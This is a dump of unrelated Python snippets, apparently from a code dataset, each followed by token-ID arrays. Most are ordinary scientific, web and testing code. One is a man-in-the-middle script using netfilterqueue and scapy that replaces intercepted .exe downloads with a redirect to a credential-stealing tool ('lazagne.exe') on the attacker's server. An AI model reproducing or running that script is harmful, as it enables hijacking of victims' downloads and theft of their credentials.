import numpy as np # import sys import math import os, sys, platform import astropy.units as u from sunpy import map as smap from astropy.coordinates import SkyCoord from suncasa.io import ndfits import lmfit from astropy.time import Time import matplotlib.pyplot as plt import matplotlib.colors as colors import matplotlib.colorbar as colorbar from suncasa.utils import mstools from suncasa.utils import qlookplot as ql from mpl_toolkits.axes_grid1 import make_axes_locatable from tqdm import tqdm from astropy.io import fits import numpy.ma as ma sys.path.append(os.path.dirname(os.path.realpath(__file__))) import gstools # name of the fast gyrosynchrotron codes shared library if platform.system() == 'Linux' or platform.system() == 'Darwin': libname = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'binaries/MWTransferArr.so') if platform.system() == 'Windows': libname = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'binaries/MWTransferArr64.dll') def mwspec2min_1src(params, freqghz, tb=None, tb_err=None, arcsec2cm=0.725e8, showplt=False): # params are defined by lmfit.Paramters() ''' params: parameters defined by lmfit.Paramters() freqghz: frequencies in GHz ssz: pixel size in arcsec tb: reference brightness temperature in K tb_err: uncertainties of reference brightness temperature in K ''' from scipy import interpolate GET_MW = gstools.initGET_MW(libname) # load the library ssz = float(params['ssz'].value) # # source area in arcsec^2 depth = float(params['depth'].value) # total source depth in arcsec Bmag = float(params['Bmag'].value) # magnetic field strength in G Tth = float(params['Tth'].value) # thermal temperature in MK nth = float(params['nth'].value) # thermal density in 1e10 cm^{-3} nrlh = 10. ** float(params['lognrlh'].value) # total nonthermal density above 0.1 MeV delta = float(params['delta'].value) # powerlaw index theta = float(params['theta'].value) # viewing angle in degrees Emin = float(params['Emin'].value) # low energy cutoff of nonthermal electrons in MeV Emax = float(params['Emax'].value) # high energy cutoff of nonthermal electrons in MeV E_hi = 0.1 nrl = nrlh * (Emin ** (1. - delta) - Emax * (1. - delta)) / (E_hi ** (1. - delta) - Emax ** (1. - delta)) Nf = 100 # number of frequencies NSteps = 1 # number of nodes along the line-of-sight N_E = 15 # number of energy nodes N_mu = 15 # number of pitch-angle nodes Lparms = np.zeros(11, dtype='int32') # array of dimensions etc. Lparms[0] = NSteps Lparms[1] = Nf Lparms[2] = N_E Lparms[3] = N_mu Rparms = np.zeros(5, dtype='double') # array of global floating-point parameters Rparms[0] = ssz * arcsec2cm ** 2 # Area, cm^2 # Rparms[0] = 1e20 # area, cm^2 Rparms[1] = 1e9 # starting frequency to calculate spectrum, Hz Rparms[2] = 0.02 # logarithmic step in frequency Rparms[3] = 12 # f^C Rparms[4] = 12 # f^WH ParmLocal = np.zeros(24, dtype='double') # array of voxel parameters - for a single voxel ParmLocal[0] = depth * arcsec2cm / NSteps # voxel depth, cm ParmLocal[1] = Tth * 1e6 # T_0, K ParmLocal[2] = nth * 1e10 # n_0 - thermal electron density, cm^{-3} ParmLocal[3] = Bmag # B - magnetic field, G Parms = np.zeros((24, NSteps), dtype='double', order='F') # 2D array of input parameters - for multiple voxels for i in range(NSteps): Parms[:, i] = ParmLocal # most of the parameters are the same in all voxels # if NSteps > 1: # Parms[4, i] = 50.0 + 30.0 * i / (NSteps - 1) # the viewing angle varies from 50 to 80 degrees along the LOS # else: # Parms[4, i] = 50.0 # the viewing angle varies from 50 to 80 degrees along the LOS Parms[4, i] = theta # parameters of the electron distribution function n_b = nrl # n_b - nonthermal electron density, cm^{-3} mu_c = np.cos(np.pi * 70 / 180) # loss-cone boundary dmu_c = 0.2 # Delta_mu E_arr = np.logspace(np.log10(Emin), np.log10(Emax), N_E, dtype='double') # energy grid (logarithmically spaced) mu_arr = np.linspace(-1.0, 1.0, N_mu, dtype='double') # pitch-angle grid f0 = np.zeros((N_E, N_mu), dtype='double') # 2D distribution function array - for a single voxel # computing the distribution function (equivalent to PLW & GLC) A = n_b / (2.0 * np.pi) * (delta - 1.0) / (Emin ** (1.0 - delta) - Emax ** (1.0 - delta)) B = 0.5 / (mu_c + dmu_c * np.sqrt(np.pi) / 2 * math.erf((1.0 - mu_c) / dmu_c)) for i in range(N_E): for j in range(N_mu): amu = abs(mu_arr[j]) f0[i, j] = A * B * E_arr[i] ** (-delta) * (1.0 if amu < mu_c else np.exp(-((amu - mu_c) / dmu_c) ** 2)) f_arr = np.zeros((N_E, N_mu, NSteps), dtype='double', order='F') # 3D distribution function array - for multiple voxels for k in range(NSteps): f_arr[:, :, k] = f0 # electron distribution function is the same in all voxels RL = np.zeros((7, Nf), dtype='double', order='F') # input/output array # calculating the emission for array distribution (array -> on) res = GET_MW(Lparms, Rparms, Parms, E_arr, mu_arr, f_arr, RL) if res: # retrieving the results f = RL[0] I_L = RL[5] I_R = RL[6] if showplt: import matplotlib.pyplot as plt fig, ax = plt.subplots(1, 1) ax.plot(f, I_L + I_R) ax.set_xscale('log') ax.set_yscale('log') ax.set_title('Total intensity (array)') ax.set_xlabel('Frequency, GHz') ax.set_ylabel('Intensity, sfu') flx_model = I_L + I_R flx_model = np.nan_to_num(flx_model) + 1e-11 logf = np.log10(f) logflx_model = np.log10(flx_model) logfreqghz = np.log10(freqghz) interpfunc = interpolate.interp1d(logf, logflx_model, kind='linear') logmflx = interpfunc(logfreqghz) mflx = 10. ** logmflx mtb = sfu2tb(np.array(freqghz) * 1.e9, mflx, ssz) else: print("Calculation error!") if tb is None: return mtb if tb_err is None: # return mTb - Tb return mtb - tb # wt = 1./flx_err # wt = 1./(Tb_err/Tb/np.log(10.)) # residual = np.abs((logmTb - np.log10(Tb))) * wt # residual = np.abs((mflx - flx)) * wt residual = (mtb - tb) / tb_err return residual
[ 11748, 299, 32152, 355, 45941, 198, 2, 1330, 25064, 198, 11748, 10688, 198, 11748, 28686, 11, 25064, 11, 3859, 198, 11748, 6468, 28338, 13, 41667, 355, 334, 198, 6738, 4252, 9078, 1330, 3975, 355, 895, 499, 198, 6738, 6468, 28338, 13, ...
2.260137
2,910
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 6738, 11593, 37443, 834, 1330, 28000, 1098, 62, 17201, 874, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 4981, 11, 15720, 602, 628 ]
2.891892
37
import io import sys import unittest import asyncio import random from contextlib import redirect_stdout from .utils import * from queuebot import QueueBot, QueueConfig, DiscordUser config = { "SECRET_TOKEN": "NOONEWILLEVERGUESSTHISSUPERSECRETSTRINGMWAHAHAHA", "TA_ROLES": ["UGTA"], "LISTEN_CHANNELS": ["join-queue"], "CHECK_VOICE_WAITING": "False", "VOICE_WAITING": "waiting-room", "ALERT_ON_FIRST_JOIN": "True", "VOICE_OFFICES": ["Office Hours Room 1", "Office Hours Room 2", "Office Hours Room 3"], "ALERTS_CHANNEL": "queue-alerts", } config = QueueConfig(config, test_mode=True) # TODO Comment each test case if __name__ == '__main__': unittest.main()
[ 11748, 33245, 198, 11748, 25064, 198, 11748, 555, 715, 395, 198, 11748, 30351, 952, 198, 11748, 4738, 198, 6738, 4732, 8019, 1330, 18941, 62, 19282, 448, 198, 6738, 764, 26791, 1330, 1635, 198, 198, 6738, 16834, 13645, 1330, 4670, 518, ...
2.587361
269
""" .. module:: aws_utilities_cli.iam :platform: OS X :synopsis: Small collection of utilities that use the Amazon Web Services (AWS) SDK .. moduleauthor:: dataday """ __all__ = ['generate_identity', 'generate_policy']
[ 37811, 198, 492, 8265, 3712, 3253, 82, 62, 315, 2410, 62, 44506, 13, 1789, 198, 220, 220, 220, 1058, 24254, 25, 7294, 1395, 198, 220, 220, 220, 1058, 28869, 24608, 25, 10452, 4947, 286, 20081, 326, 198, 220, 220, 220, 220, 220, 220,...
2.843373
83
# Copyright 2019 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import numpy as np from tests.common.tensorio import compare_tensor from tests.common.test_op import triangle from akg.utils import kernel_exec as utils from tests.common.gen_random import random_gaussian
[ 2, 15069, 13130, 43208, 21852, 1766, 1539, 12052, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, 351, 262, 13789, 13, 198...
3.845411
207
# Generated by Django 2.0.3 on 2018-05-14 21:06 from django.db import migrations, models
[ 2, 2980, 515, 416, 37770, 362, 13, 15, 13, 18, 319, 2864, 12, 2713, 12, 1415, 2310, 25, 3312, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 11, 4981, 628 ]
2.84375
32
# # The tuner class to initiate the empirical performance tuning process # import re, sys, os from orio.main.util.globals import * import orio.main.dyn_loader, orio.main.tspec.tspec, orio.main.tuner.ptest_codegen, orio.main.tuner.ptest_driver #-------------------------------------------------- # the name of the module containing various search algorithms SEARCH_MOD_NAME = 'orio.main.tuner.search' #--------------------------------------------------
[ 2, 198, 2, 383, 6278, 263, 1398, 284, 22118, 262, 21594, 2854, 24549, 1429, 198, 2, 198, 198, 11748, 302, 11, 25064, 11, 28686, 198, 198, 6738, 22812, 78, 13, 12417, 13, 22602, 13, 4743, 672, 874, 1330, 1635, 198, 11748, 22812, 78, ...
3.55814
129
from transformer import * from logger import logger def verify_data(collection): 'verify the data format is correct or not.' for d in collection.find(): info = d.get('d').get('info') if len(info) <12 and info[0] != '1': logger.error('invalid patient info:' + d['_id']+str(info)) if len(d.get('d').get('doctor_advice')) == 0: logger.error('invalid doctor advice:' + d['_id']) else: has_long = False has_short = False for a in d.get('d').get('doctor_advice'): if len(a) != 18: logger.error('invalid doctor advice:' + d['_id']) logger.error("invalid doctor advice: " + a) if a[3] == '': has_long = True else: has_short = True if not (has_long and has_short): logger.error('invalid doctor advice: ' + d['_id'] + ', long/short: {}/{}'.format(has_long, has_short) ) def get_info(collection): 'count PE' for d in collection.find(): if len(d.get('d').get('doctor_advice')) == 0: print('invalid doctor advice:' + d['_id']) else: one_p = split_all_ad(d) print(one_p) break def main(): 'main entry' from datetime import datetime from db import paients_source start = datetime.now() print('hello..') # verify_data(paients_source) # get_info(collection) find_missing() print(datetime.now() - start) if __name__ == '__main__': main()
[ 6738, 47385, 1330, 1635, 198, 6738, 49706, 1330, 49706, 198, 198, 4299, 11767, 62, 7890, 7, 43681, 2599, 198, 220, 220, 220, 705, 332, 1958, 262, 1366, 5794, 318, 3376, 393, 407, 2637, 198, 220, 220, 220, 329, 288, 287, 4947, 13, 19...
2.056774
775
#!/usr/bin/env python import os import re import subprocess import sys # version -> classifier # '' means default classifier cuda_vers = { '11.2': ['cuda11', ''] } def check_classifier(classifier): ''' Check the mapping from cuda version to jar classifier. Used by maven build. ''' cu_ver = detect_cuda_ver() classifier_list = cuda_vers[cu_ver] if classifier not in classifier_list: raise Exception("Jar classifier '{}' mismatches the 'nvcc' version {} !".format(classifier, cu_ver)) def get_supported_vers(): ''' Get the supported cuda versions. ''' return cuda_vers.keys() def get_supported_vers_str(): ''' Get the supported cuda versions and join them as a string. Used by shell script. ''' return ' '.join(cuda_vers.keys()) def detect_cuda_ver(): ''' Detect the cuda version from current nvcc tool. ''' nvcc_ver_bin = subprocess.check_output('nvcc --version', shell=True) nvcc_ver = re.search('release ([.0-9]+), V([.0-9]+)', str(nvcc_ver_bin)).group(1) if nvcc_ver in get_supported_vers(): return nvcc_ver else: raise Exception("Unsupported cuda version: {}, Please check your 'nvcc' version.".format(nvcc_ver)) if __name__ == "__main__": num_args = len(sys.argv) action = sys.argv[1].lower() if num_args > 1 else 'l' if action =='c': classifier = sys.argv[2].lower() if num_args > 2 else '' check_classifier(classifier) elif action == 'd': print(detect_cuda_ver()) elif action == 'g': print(get_classifier()) elif action == 'l': print(get_supported_vers_str()) else: print("Unsupported action: " + action)
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 11748, 28686, 198, 11748, 302, 198, 11748, 850, 14681, 198, 11748, 25064, 198, 198, 2, 2196, 4613, 1398, 7483, 198, 2, 10148, 1724, 4277, 1398, 7483, 198, 66, 15339, 62, 690, 796, 1391...
2.450785
701
# Generated by Django 3.0.2 on 2020-03-29 19:11 from django.db import migrations
[ 2, 2980, 515, 416, 37770, 513, 13, 15, 13, 17, 319, 12131, 12, 3070, 12, 1959, 678, 25, 1157, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 628 ]
2.766667
30
import pytz from datetime import date, time, datetime, timedelta from django.core.exceptions import ValidationError from django.db import models START_HOUR = 9 END_HOUR = 18 workingHours = END_HOUR - START_HOUR def findExpiryDate(sla): """ Finds the expiry date for a ticket based on 1. Severity of the ticket 2. Date of issue """ now = datetime.now() flag = 1 # if ticket is received today between 00:00 hours to Start_Hour # we reset the flag if now.hour < START_HOUR: flag = 0 # if ticket is received today between office hours then # we simply deduct working hours left today from sla if START_HOUR < now.hour < END_HOUR: hoursLeftToday = END_HOUR - sla sla -= hoursLeftToday tomorrow = date.today() + timedelta(days=flag) shiftTime = time(START_HOUR,0,0) dt = datetime.combine(tomorrow, shiftTime, pytz.utc) dt = adjust_Weekends_And_Holidays(dt) # adjust incase we hit a weekend # now we find the office days and office hours # we would need to complete the sla days, hours = divmod(sla, workingHours) dt += timedelta(hours=hours) dt = adjust_Weekends_And_Holidays(dt, days=days) # adjust incase we hit a weekend return dt def isWeekend(dt): """Finds if a date lies on a weekend or not. Returns a boolean""" if 0 < dt.weekday() < 6: return False else: return True def isHoliday(dt): """Finds if a date lies on a holiday or not. Returns a boolean""" return Holiday.objects.filter(day=dt.date()).exists() def adjust_Weekends_And_Holidays(dt, days=0): """ Adjust the datetime to a future datetime accomodating for 1. days needed 2. skipping Weekends """ while isWeekend(dt) or isHoliday(dt): dt += timedelta(days=1) while days: dt += timedelta(days=1) if isWeekend(dt) or isHoliday(dt): continue else: days -= 1 return dt
[ 11748, 12972, 22877, 198, 6738, 4818, 8079, 1330, 3128, 11, 640, 11, 4818, 8079, 11, 28805, 12514, 198, 198, 6738, 42625, 14208, 13, 7295, 13, 1069, 11755, 1330, 3254, 24765, 12331, 198, 6738, 42625, 14208, 13, 9945, 1330, 4981, 628, 19...
2.53129
783
from hypothesis import given from tests.port_tests.hints import (PortedBoundingBox, PortedPoint) from tests.utils import equivalence from . import strategies
[ 6738, 14078, 1330, 1813, 198, 198, 6738, 5254, 13, 634, 62, 41989, 13, 71, 29503, 1330, 357, 47, 9741, 33, 9969, 14253, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, ...
2.525641
78
import pytest # import station
[ 11748, 12972, 9288, 198, 2, 1330, 4429, 628, 198 ]
3.666667
9
#!/usr/bin/env python3 import logging import torch.nn as nn from fairseq import checkpoint_utils from fairseq.models import BaseFairseqModel, register_model from pytorch_translate import rnn from pytorch_translate.rnn import ( LSTMSequenceEncoder, RNNDecoder, RNNEncoder, RNNModel, base_architecture, ) from pytorch_translate.tasks.pytorch_translate_task import PytorchTranslateTask logger = logging.getLogger(__name__)
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 198, 11748, 18931, 198, 198, 11748, 28034, 13, 20471, 355, 299, 77, 198, 6738, 3148, 41068, 1330, 26954, 62, 26791, 198, 6738, 3148, 41068, 13, 27530, 1330, 7308, 30099, 41068, 17633...
2.736196
163
from ._utils import construct_dia, construct_hth, construct_sampling_matrix from .bsgda import bsgda, computing_sets, recon_bsgda, solving_set_covering from .ess import ess, ess_sampling, recon_ess from .fastgsss import fastgsss, recon_fastssss from .rsbs import cheby_coeff4ideal_band_pass, estimate_lk, recon_rsbs, rsbs __all__ = [ "ess", "ess_sampling", "bsgda", "computing_sets", "solving_set_covering", "cheby_coeff4ideal_band_pass", "estimate_lk", "rsbs", "fastgsss", # reconstruction "recon_fastssss", "recon_bsgda", "recon_ess", "recon_rsbs", # utils "construct_sampling_matrix", "construct_hth", "construct_dia", ]
[ 6738, 47540, 26791, 1330, 5678, 62, 67, 544, 11, 5678, 62, 71, 400, 11, 5678, 62, 37687, 11347, 62, 6759, 8609, 198, 6738, 764, 1443, 70, 6814, 1330, 275, 45213, 6814, 11, 14492, 62, 28709, 11, 8195, 62, 1443, 70, 6814, 11, 18120, ...
2.255663
309
import tempfile import os import sys sys.path.insert(1,"../../") import h2o from h2o.estimators import H2OGeneralizedLinearEstimator, H2OGenericEstimator from tests import pyunit_utils from tests.testdir_generic_model import compare_output, Capturing, compare_params if __name__ == "__main__": pyunit_utils.standalone_test(mojo_model_test_binomial) pyunit_utils.standalone_test(mojo_model_test_multinomial) pyunit_utils.standalone_test(mojo_model_test_regression) pyunit_utils.standalone_test(mojo_model_test_ordinal) else: mojo_model_test_binomial() mojo_model_test_multinomial() mojo_model_test_regression() mojo_model_test_ordinal()
[ 11748, 20218, 7753, 198, 11748, 28686, 198, 11748, 25064, 198, 17597, 13, 6978, 13, 28463, 7, 16, 553, 40720, 40720, 4943, 198, 198, 11748, 289, 17, 78, 198, 6738, 289, 17, 78, 13, 395, 320, 2024, 1330, 367, 17, 7730, 877, 282, 1143...
2.59387
261
# (c) Copyright 2015 Hewlett Packard Enterprise Development LP # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Test base class of 3PAR Client.""" import os import sys import unittest import subprocess import time import inspect from pytest_testconfig import config import datetime from functools import wraps from hpe3parclient import client, file_client TIME = datetime.datetime.now().strftime('%H%M%S') try: # For Python 3.0 and later from urllib.parse import urlparse except ImportError: # Fall back to Python 2's urllib2 from urlparse import urlparse
[ 2, 357, 66, 8, 15069, 1853, 30446, 15503, 6400, 446, 14973, 7712, 18470, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, ...
3.576667
300
# This code is part of Qiskit. # # (C) Copyright IBM 2018, 2022. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """ Test Driver HDF5 """ import os import pathlib import shutil import tempfile import unittest import warnings from test import QiskitNatureTestCase from test.drivers.second_quantization.test_driver import TestDriver from qiskit_nature.drivers.second_quantization import HDF5Driver from qiskit_nature.drivers import QMolecule from qiskit_nature.properties.second_quantization.electronic import ElectronicStructureDriverResult if __name__ == "__main__": unittest.main()
[ 2, 770, 2438, 318, 636, 286, 1195, 1984, 270, 13, 198, 2, 198, 2, 357, 34, 8, 15069, 19764, 2864, 11, 33160, 13, 198, 2, 198, 2, 770, 2438, 318, 11971, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 13, 921, 743, 198, 2, 7330...
3.57037
270
######################################################################## # import default libraries ######################################################################## import os import csv import sys import gc ######################################################################## ######################################################################## # import additional libraries ######################################################################## import numpy as np import scipy.stats import torch import torch.nn as nn # from import from tqdm import tqdm from sklearn import metrics try: from sklearn.externals import joblib except: import joblib # original lib import common as com from pytorch_model import AutoEncoder ######################################################################## ######################################################################## # load parameter.yaml ######################################################################## param = com.yaml_load() ####################################################################### ######################################################################## # output csv file ######################################################################## ######################################################################## ######################################################################## # main 01_test.py ######################################################################## if __name__ == "__main__": #################################################################### # set device #################################################################### device = torch.device("cuda" if torch.cuda.is_available() else "cpu") print("device : {}".format(device)) #################################################################### # check mode # "development": mode == True # "evaluation": mode == False mode = com.command_line_chk() if mode is None: sys.exit(-1) # make output result directory os.makedirs(param["result_directory"], exist_ok=True) # load base directory dirs = com.select_dirs(param=param, mode=mode) # initialize lines in csv for AUC and pAUC csv_lines = [] if mode: performance_over_all = [] # loop of the base directory for idx, target_dir in enumerate(dirs): print("\n===========================") print("[{idx}/{total}] {target_dir}".format(target_dir=target_dir, idx=idx+1, total=len(dirs))) machine_type = os.path.split(target_dir)[1] print("============== MODEL LOAD ==============") # load model file model_file = "{model}/model_{machine_type}.hdf5".format(model=param["model_directory"], machine_type=machine_type) if not os.path.exists(model_file): com.logger.error("{} model not found ".format(machine_type)) sys.exit(-1) input_channel = param["feature"]["n_mels"] * param["feature"]["n_frames"] model = AutoEncoder(input_channel).to(device) model.eval() if device.type == "cuda": model.load_state_dict(torch.load(model_file)) elif device.type == "cpu": model.load_state_dict(torch.load(model_file, map_location=torch.device("cpu"))) # load anomaly score distribution for determining threshold score_distr_file_path = "{model}/score_distr_{machine_type}.pkl".format(model=param["model_directory"], machine_type=machine_type) shape_hat, loc_hat, scale_hat = joblib.load(score_distr_file_path) # determine threshold for decision decision_threshold = scipy.stats.gamma.ppf(q=param["decision_threshold"], a=shape_hat, loc=loc_hat, scale=scale_hat) if mode: # results for each machine type csv_lines.append([machine_type]) csv_lines.append(["section", "domain", "AUC", "pAUC", "precision", "recall", "F1 score"]) performance = [] dir_names = ["source_test", "target_test"] for dir_name in dir_names: #list machine id section_names = com.get_section_names(target_dir, dir_name=dir_name) for section_name in section_names: # load test file files, y_true = com.file_list_generator(target_dir=target_dir, section_name=section_name, dir_name=dir_name, mode=mode) # setup anomaly score file path anomaly_score_csv = "{result}/anomaly_score_{machine_type}_{section_name}_{dir_name}.csv".format(result=param["result_directory"], machine_type=machine_type, section_name=section_name, dir_name=dir_name) anomaly_score_list = [] # setup decision result file path decision_result_csv = "{result}/decision_result_{machine_type}_{section_name}_{dir_name}.csv".format(result=param["result_directory"], machine_type=machine_type, section_name=section_name, dir_name=dir_name) decision_result_list = [] print("\n============== BEGIN TEST FOR A SECTION ==============") y_pred = [0. for k in files] for file_idx, file_path in tqdm(enumerate(files), total=len(files)): try: data = com.file_to_vectors(file_path, n_mels=param["feature"]["n_mels"], n_frames=param["feature"]["n_frames"], n_fft=param["feature"]["n_fft"], hop_length=param["feature"]["hop_length"], power=param["feature"]["power"]) except: com.logger.error("File broken!!: {}".format(file_path)) data = torch.tensor(data, dtype=torch.float32).to(device) reconst = model(data) mseloss = nn.functional.mse_loss(data.detach(), reconst.detach()) y_pred[file_idx] = mseloss.item() # store anomaly scores anomaly_score_list.append([os.path.basename(file_path), y_pred[file_idx]]) # store decision results if y_pred[file_idx] > decision_threshold: decision_result_list.append([os.path.basename(file_path), 1]) else: decision_result_list.append([os.path.basename(file_path), 0]) # output anomaly scores save_csv(save_file_path=anomaly_score_csv, save_data=anomaly_score_list) com.logger.info("anomaly score result -> {}".format(anomaly_score_csv)) # output decision results save_csv(save_file_path=decision_result_csv, save_data=decision_result_list) com.logger.info("decision result -> {}".format(decision_result_csv)) if mode: # append AUC and pAUC to lists auc = metrics.roc_auc_score(y_true, y_pred) p_auc = metrics.roc_auc_score(y_true, y_pred, max_fpr=param["max_fpr"]) tn, fp, fn, tp = metrics.confusion_matrix(y_true, [1 if x > decision_threshold else 0 for x in y_pred]).ravel() prec = tp / np.maximum(tp + fp, sys.float_info.epsilon) recall = tp / np.maximum(tp + fn, sys.float_info.epsilon) f1 = 2.0 * prec * recall / np.maximum(prec + recall, sys.float_info.epsilon) csv_lines.append([section_name.split("_", 1)[1], dir_name.split("_", 1)[0], auc, p_auc, prec, recall, f1]) performance.append([auc, p_auc, prec, recall, f1]) performance_over_all.append([auc, p_auc, prec, recall, f1]) com.logger.info("AUC : {}".format(auc)) com.logger.info("pAUC : {}".format(p_auc)) com.logger.info("precision : {}".format(prec)) com.logger.info("recall : {}".format(recall)) com.logger.info("F1 score : {}".format(f1)) print("\n============ END OF TEST FOR A SECTION ============") if mode: # calculate averages for AUCs and pAUCs amean_performance = np.mean(np.array(performance, dtype=float), axis=0) csv_lines.append(["arithmetic mean", ""] + list(amean_performance)) hmean_performance = scipy.stats.hmean(np.maximum(np.array(performance, dtype=float), sys.float_info.epsilon), axis=0) csv_lines.append(["harmonic mean", ""] + list(hmean_performance)) csv_lines.append([]) del data del model if mode: csv_lines.append(["", "", "AUC", "pAUC", "precision", "recall", "F1 score"]) # calculate averages for AUCs and pAUCs amean_performance = np.mean(np.array(performance_over_all, dtype=float), axis=0) csv_lines.append(["arithmetic mean over all machine types, sections, and domains", ""] + list(amean_performance)) hmean_performance = scipy.stats.hmean(np.maximum(np.array(performance_over_all, dtype=float), sys.float_info.epsilon), axis=0) csv_lines.append(["harmonic mean over all machine types, sections, and domains", ""] + list(hmean_performance)) csv_lines.append([]) # output results result_path = "{result}/{file_name}".format(result=param["result_directory"], file_name=param["result_file"]) com.logger.info("results -> {}".format(result_path)) save_csv(save_file_path=result_path, save_data=csv_lines)
[ 29113, 29113, 7804, 201, 198, 2, 1330, 4277, 12782, 201, 198, 29113, 29113, 7804, 201, 198, 11748, 28686, 201, 198, 11748, 269, 21370, 201, 198, 11748, 25064, 201, 198, 11748, 308, 66, 201, 198, 29113, 29113, 7804, 201, 198, 201, 198, ...
2.042251
5,420
#!/usr/bin/env python import netfilterqueue import scapy.all as scapy ack_list = [] def process_packet(packet): """Modify downloads files on the fly while target uses HTTP/HTTPS. Do not forget to choose the port you will be using in line 22/29. Do not forget to modify line 24 and 35 and uncomment them afterwards.""" scapy_packet = scapy.IP (packet.get_payload()) if scapy_packet.haslayer(scapy.Raw): if scapy_packet[scapy.TCP].dport == #CHOOSE PORT HERE: 80 / 10000: # print("HTTP Request") if ".exe" in scapy_packet[scapy.Raw].load and #Input IP of your web server here: "10.0.2.15" not in scapy_packet[scapy.Raw].load: print("Captured .exe file in the Request packet.") ack_list.append(scapy_packet[scapy.TCP].ack) # print(scapy_packet.show()) elif scapy_packet[scapy.TCP].sport ==#CHOOSE PORT HERE: 80 / 10000: # print("HTTP Response") if scapy_packet[scapy.TCP].seq in ack_list: ack_list.remove(scapy_packet[scapy.TCP].seq) print("Replacing the file.") # print(scapy_packet.show()) modified_packet = set_load(scapy_packet, #Input the full path of your executable here: "HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.15/Evil%20Files/lazagne.exe\n\n") packet.set_payload(str(modified_packet)) packet.accept() queue = netfilterqueue.NetfilterQueue() queue.bind(0, process_packet) queue.run()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 11748, 2010, 24455, 36560, 198, 11748, 629, 12826, 13, 439, 355, 629, 12826, 198, 198, 441, 62, 4868, 796, 17635, 628, 198, 4299, 1429, 62, 8002, 316, 7, 8002, 316, 2599, 198, 2...
2.264793
676
from sqlalchemy.ext.declarative import declarative_base from sqlalchemy import create_engine from sqlalchemy import Column, Integer, String, Text, ForeignKey, DateTime, func, Boolean from sqlalchemy.orm import relation, sessionmaker, relationship, backref from datetime import datetime import os # Database DATABASE = 'sqlite:///db.sqlite3' DEBUG = True # ORM Base = declarative_base() # model # if __name__ == '__main__': # connection engine = create_engine(DATABASE, echo = DEBUG) session_factory = sessionmaker(bind = engine) session = session_factory() # initialize database if not os.path.exists('db.sqlite3'): Base.metadata.create_all(engine)
[ 6738, 44161, 282, 26599, 13, 2302, 13, 32446, 283, 876, 1330, 2377, 283, 876, 62, 8692, 198, 6738, 44161, 282, 26599, 1330, 2251, 62, 18392, 198, 6738, 44161, 282, 26599, 1330, 29201, 11, 34142, 11, 10903, 11, 8255, 11, 8708, 9218, 11...
3.122642
212
from openpyxl import Workbook wb = Workbook() ws = wb.active data = [ ["Fruit", "Quantity"], ["Kiwi", 3], ["Grape", 15], ["Apple", 3], ["Peach", 3], ["Pomegranate", 3], ["Pear", 3], ["Tangerine", 3], ["Blueberry", 3], ["Mango", 3], ["Watermelon", 3], ["Blackberry", 3], ["Orange", 3], ["Raspberry", 3], ["Banana", 3] ] for r in data: ws.append(r) ws.auto_filter.ref = "A1:B15" ws.auto_filter.add_filter_column(0, ["Kiwi", "Apple", "Mango"]) ws.auto_filter.add_sort_condition("B2:B15") wb.save("filtered.xlsx")
[ 6738, 1280, 9078, 87, 75, 1330, 5521, 2070, 198, 198, 39346, 796, 5521, 2070, 3419, 198, 18504, 796, 266, 65, 13, 5275, 198, 198, 7890, 796, 685, 198, 220, 220, 220, 14631, 37, 4872, 1600, 366, 31208, 33116, 198, 220, 220, 220, 1463...
2.090253
277
from bleak import BleakClient import asyncio import functools notify_uuid = "00002a19-0000-1000-8000-00805f9b34fb".format(0x2A19) if __name__ == "__main__": run( ["96E8409A-F2EB-4029-B3DC-615FADE0C838","D31CB0CA-890E-476B-80D9-80ED8A3AA69A"] )
[ 6738, 30942, 1330, 17175, 461, 11792, 198, 11748, 30351, 952, 198, 11748, 1257, 310, 10141, 198, 198, 1662, 1958, 62, 12303, 312, 796, 366, 2388, 17, 64, 1129, 12, 2388, 12, 12825, 12, 33942, 12, 405, 28256, 69, 24, 65, 2682, 21855, ...
1.948529
136
if __name__ == '__main__': keys = [15, 10, 20, 8, 12, 16, 25] root = constructBST(keys) inorder(root)
[ 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 198, 220, 220, 220, 8251, 796, 685, 1314, 11, 838, 11, 1160, 11, 807, 11, 1105, 11, 1467, 11, 1679, 60, 198, 220, 220, 220, 6808, 796, 5678, 33, 2257, 7, 13083, 8, 198, 2...
2.173077
52
from ndebug import env_helpers
[ 6738, 299, 24442, 1330, 17365, 62, 16794, 364, 628, 198 ]
3.3
10
